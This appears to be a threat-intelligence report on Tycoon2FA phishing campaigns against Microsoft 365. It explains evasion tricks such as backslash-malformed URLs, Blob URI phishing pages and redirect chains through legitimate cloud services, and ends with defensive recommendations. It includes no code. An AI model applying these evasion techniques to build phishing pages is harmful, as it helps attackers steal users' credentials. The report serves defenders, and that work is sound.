Background

Recently, security experts have discovered a wave of targeted phishing campaigns aimed at Microsoft 365 users. These campaigns are conducted by Tycoon2FA, a notorious threat actor specializing in phishing-as-a-service (PhaaS). The main goal of these campaigns is to steal user credentials to hijack accounts.

Phishing emails impersonate official Microsoft notifications, such as security alerts or multi-factor authentication (2FA) requests, to create a sense of urgency and lure users into clicking on fake links.

Who is Tycoon2FA?

Tycoon2FA is a well-known cybercriminal group specializing in Phishing-as-a-Service (PhaaS). They not only carry out attacks themselves but also develop and provide phishing tools and support services to other attackers. This is akin to an "outsourcing service" that enables others to easily organize phishing campaigns, particularly targeting users of popular cloud platforms like Microsoft 365.

A notable aspect of Tycoon2FA is their sophistication in updating and enhancing attack techniques. They not only use traditional methods but also apply new tricks, such as creating malformed URLs or designing complex redirect chains to deceive even the most advanced security systems. These tactics help them easily bypass email and browser security layers that many organizations rely on.

Another noteworthy point is that Tycoon2FA leverages legitimate cloud infrastructure like Microsoft Azure, Cloudflare Workers, or Google DoubleClick to host and distribute phishing content. This not only increases credibility with victims but also makes it extremely difficult for security teams to detect and remove fake pages.

The group also frequently spams numerous fake 2FA requests to collect login information, a highly effective method as many organizations are increasingly using 2FA to protect accounts.

Tycoon2FA exemplifies the growing trend of cybercriminal groups using professional, sophisticated, and systematic phishing service models. They are not just attackers but also providers of tools and tactics for the cybercriminal community, making the security battle increasingly challenging.

Technical Analysis

Below are some sophisticated techniques used by criminal groups to conduct phishing activities:

Malformed URLs Technique

The attackers use URLs with backslashes instead of the standard forward slashes, for example, https:\\ instead of https://. This is a deliberate tactic to create "malformed URLs" that regular email security filters often overlook or deprioritize.

However, modern browsers can automatically process and convert these URLs to the standard form, leading users to sophisticated phishing sites. Thus, this method creates a blind spot in email security systems, helping attackers avoid detection and blocking.

Blob URI Technique to Avoid Detection

Another advanced technique recently discovered is the exploitation of Blob URI (Uniform Resource Identifier) — a type of address created by the browser to reference local data in the browser's memory, such as temporary image, audio, or video files.

In phishing campaigns, instead of directly leading to a malicious website on the internet (easily detected by security systems), the email directs users to a legitimate intermediary page, such as onedrive.live.com. This intermediary page then redirects users to an HTML page controlled by the attacker, which creates a Blob URI containing the entire phishing page content right in the victim's browser memory.

Figure 1. A blob URI page impersonating the OneDrive login page

The special feature is that Blob URI only exists locally in the browser, cannot be accessed or scanned remotely by conventional security tools. This makes detecting phishing content very difficult, as automated analysis tools or email scanning software cannot preview the content of a Blob URI. Users will see a fake login page very similar to Microsoft or OneDrive, easily deceived into entering login information.

Figure 2. Infection chain of Blob URI phishing attack

Using Legitimate Cloud Platforms as "Disposable Infrastructure"

Phishing pages are often hosted on reputable cloud platforms like Microsoft Azure, Cloudflare Workers, or Google DoubleClick. Leveraging these legitimate services makes detection and removal much more difficult.

Complex Redirect Chains and Trusted Service Emulation

Phishing emails often direct users to legitimate intermediary pages to avoid being flagged by security systems. From there, users are redirected to HTML pages controlled by the attacker, mimicking the login pages of Microsoft 365 or OneDrive.

Using Fake Domains

The attack infrastructure uses domains and subdomains very similar to legitimate services, increasing the persuasiveness and success rate of social engineering techniques.

IOCs Related to Tycoon2FA Campaign

Recommendations

FPT Threat Intelligence recommends organizations and individuals take several measures to prevent this particularly dangerous attack campaign:

• Update and Upgrade Email Security Systems: Organizations using Microsoft 365 should update email filters to detect and handle malformed URLs, as well as complex redirect chains commonly used in modern phishing campaigns.

• Enhance Browser Protection: Implement mechanisms to block access to newly discovered malicious domains and alert users about suspicious pages.

• Raise User Awareness: Train users to recognize phishing emails, especially those with unusual 2FA requests or security alerts; guide them to verify the legitimacy of URLs before entering login information.

• Behavior Analysis and AI Application: Use user behavior analysis tools and AI to early detect unusual signs in email interactions and web access.

• Monitor and Handle Attack Infrastructure: Strengthen monitoring of domains and cloud platforms exploited to host phishing content to take timely preventive measures.

References

• Microsoft 365 Users Targeted by Tycoon2FA Linked Phishing Attack to Steal Credentials

• Phishing Campaign Uses Blob URLs to Bypass Email Security and Avoid Detection